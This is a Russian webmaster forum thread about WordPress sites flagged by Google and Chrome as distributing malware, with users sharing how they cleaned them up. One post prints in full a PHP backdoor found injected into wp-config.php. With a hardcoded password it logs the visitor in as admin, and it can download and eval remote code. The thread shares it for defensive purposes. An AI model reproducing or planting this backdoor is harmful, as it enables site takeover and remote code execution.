[fasin]

хех, такая же хрень..тоже на 2 сайтах это вылезло..
первый сайт сам как то выздоровел через несколько дней, но второй все ещё сидит

[dekartwork]

Компьютер на вирусы проверил, нет ни одного. Вчера на двух вылазило, сменил пароль фтп, с одного ушло. Появляется только когда через хром, в опере и лисичке проблем нет. В гугл вебмастере "вредоносный код не обнаружен". Только что проверил, в строке статуса вроде уже не подгружается этот адрес, но хром упорно твердит что обнаружена проблема. Тех поддержка направляет на какие то статьи, смотрел, да про вирусы про разные но толком о моем случае ничего нет. Может подождать еще немного? По идее, судя по тому что пишет гугл, если есть проблема, он ее в течение суток должен отобразить в вебмастере, у меня сутки на исходе.

[ShelfZet]

dekartwork, тоже сменил все пароли от фтп, на некоторых сайтах все нормально, на 2 сайта хром ругается по прежнему

[dekartwork]

Дело в том, что я просто понятия не имею как работают такие вирусы, ну и соответственно не знаю куда смотреть. Может переустановить сам движок и подключить к базе? Поможет?

[ShelfZet]

Дело в том, что я просто понятия не имею как работают такие вирусы, ну и соответственно не знаю куда смотреть. Может переустановить сам движок и подключить к базе? Поможет?

Я тоже понятия не имею куда смотреть. Сейчас вот проверил практически все файлы на наличие кода, нигде ничего нет. может стоит скачать все файлы сайта и проверить антивирусом

[dekartwork]

В общем открываю сайт на другом компе в хроме, проблем нет. Нахожу его через поиск, перехожу, тоже проблем нет. Что за порнография с гуглом творится? В Вебмастере проблем так и не появилось. Может гугл на ip наложил эту фигню? У кого еще проблемы такого рода были, кто как справился?

---------- Сообщение добавлено 20:44 ---------- Предыдущее 19:21 ----------

Еще больший прикол, теперь и webmasters тоже заражен.
"webmasters.ru содержит материалы сайта aleks-gold.ru, который, по имеющимся данным, распространяет вредоносное ПО. Ваш компьютер может подвергнуться вирусной атаке при посещении этого сайта.
Google обнаружил, что на ваш компьютер могут быть установлены вредоносные программы, если вы продолжите просмотр этого сайта. Если вы посещали его в прошлом или доверяете ему, вполне возможно, что он недавно был взломан хакерами. Рекомендуется прекратить просмотр и посетить сайт завтра либо перейти на другой сайт.
Мы уже сообщили владельцу сайта aleks-gold.ru о том, что на его сайте найдено вредоносное ПО. Подробнее о проблемах, обнаруженных на aleks-gold.ru, можно узнать на странице Google Страница диагностики безопасного просмотра."

[semyon]

Загляните в эту тему: Массовое заражение сайтов

Как ни странно, но я попал в их список)) И хронни помог)

Лечится такое чисткой шаблона от фреймов и скриптов + переустановка ВП (во вкладке обновления)

[dekartwork]

Да у меня вроде все пропало, гугл больше надо мной не издевается, но на всякий случай переустановил вп, по вашему совету.

[raketto]

Здравствуйте, вчера посещал данный форум, скажу сразу - я не сильный знаток в веб терминах, поэтому обьясню своими словами, дело в том, что 23.08.2011 столкнулся с такой же проблемой (типа мой сайт содержит вредоносный код и гугл его заблокировал) , в общем на мой сайт на вордпрессе занесли вредоносный код, вчера я его все-таки вылечил, код нашелся не сразу, хитрый падла. Для того чтобы определить в каком файле прописан этот код, мне пришлось открыть файл эррор.лог , там за 23.08.2011 (ведь именно в тот день занесли код) , было очень много изменений в файле wp-config.php , когда я глянул туда я чесно говоря обалдел - вместо 108 линий(строк) у меня было около 4500 тысяч и гдето на 2500 был прописан этот злосчастный код:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'ad61ab143223efbc24c7d2583be69251'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

Надеюсь что Вы , добрые люди не станете использовать его в злых намерениях.
Кстате, на этом самом файле (wp-config.php) стояли права доступа xxx , типа ВСЕ можно , и самое удивительное что я его раз десять удалял и заменял своим старым из бэкапа (не зараженным) и он все равно делался зараженным, пока я не поменял на файл права доступа 600, и разумеется все пароли.
Надеюсь информация была для Вас полезной, мне помогло.

[BryBry]

Я сталкивался с подобной проблемой. Только, немного другого плана. Тогда еще, мой двухстраничный сайт, не был в индексе у гугла. Просто, на некоторых форумах и сайтах были размещены ссылки на него. Однажды, я увидел, что весь дизайн был полностью изменен. Такой же ерунде подвергся и блог на WP (в этом случае, дизайн стал совсем непонятным), расположенный на том же хостинге. Изучив тот, двухстраничный сайт, я никаких видимых изменений в коде не заметил, и только проверка по pr-cy показала около сотни исходящих ссылок с главной страницы. Помогла замена на оригиналы, находящиеся на моем компьютере. Такое повторилось два раза. У меня вопрос, как такие вирусы встраиваются в код, и как от них защитится?